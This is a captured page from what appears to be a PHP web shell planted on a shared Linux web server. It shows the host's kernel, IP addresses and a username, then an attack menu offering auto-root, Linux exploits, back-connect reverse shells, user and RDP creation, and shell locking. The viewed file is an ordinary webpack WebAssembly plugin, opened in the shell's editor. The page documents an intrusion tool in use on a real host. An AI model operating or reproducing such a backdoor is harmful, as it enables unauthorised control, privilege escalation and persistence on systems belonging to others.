Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
lib /
wasm /
[ HOME SHELL ]
Name
Size
Permission
Action
UnsupportedWebAssemblyFeatureE...
439
B
-rw-r--r--
WasmFinalizeExportsPlugin.js
1.99
KB
-rw-r--r--
WasmMainTemplatePlugin.js
10.01
KB
-rw-r--r--
WebAssemblyGenerator.js
11.5
KB
-rw-r--r--
WebAssemblyInInitialChunkError...
2.68
KB
-rw-r--r--
WebAssemblyJavascriptGenerator...
4.69
KB
-rw-r--r--
WebAssemblyModulesPlugin.js
3.58
KB
-rw-r--r--
WebAssemblyParser.js
4.45
KB
-rw-r--r--
WebAssemblyUtils.js
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WasmFinalizeExportsPlugin.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const UnsupportedWebAssemblyFeatureError = require("./UnsupportedWebAssemblyFeatureError"); class WasmFinalizeExportsPlugin { apply(compiler) { compiler.hooks.compilation.tap("WasmFinalizeExportsPlugin", compilation => { compilation.hooks.finishModules.tap( "WasmFinalizeExportsPlugin", modules => { for (const module of modules) { // 1. if a WebAssembly module if (module.type.startsWith("webassembly") === true) { const jsIncompatibleExports = module.buildMeta.jsIncompatibleExports; if (jsIncompatibleExports === undefined) { continue; } for (const reason of module.reasons) { // 2. is referenced by a non-WebAssembly module if (reason.module.type.startsWith("webassembly") === false) { const ref = compilation.getDependencyReference( reason.module, reason.dependency ); if (!ref) continue; const importedNames = ref.importedNames; if (Array.isArray(importedNames)) { importedNames.forEach(name => { // 3. and uses a func with an incompatible JS signature if ( Object.prototype.hasOwnProperty.call( jsIncompatibleExports, name ) ) { // 4. error /** @type {any} */ const error = new UnsupportedWebAssemblyFeatureError( `Export "${name}" with ${jsIncompatibleExports[name]} can only be used for direct wasm to wasm dependencies` ); error.module = module; error.origin = reason.module; error.originLoc = reason.dependency.loc; error.dependencies = [reason.dependency]; compilation.errors.push(error); } }); } } } } } } ); }); } } module.exports = WasmFinalizeExportsPlugin;
Close